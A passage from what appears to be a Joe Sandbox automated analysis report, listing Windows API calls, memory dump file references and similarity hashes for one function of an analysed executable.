                                                        • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                        • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
                                                        • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                        • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%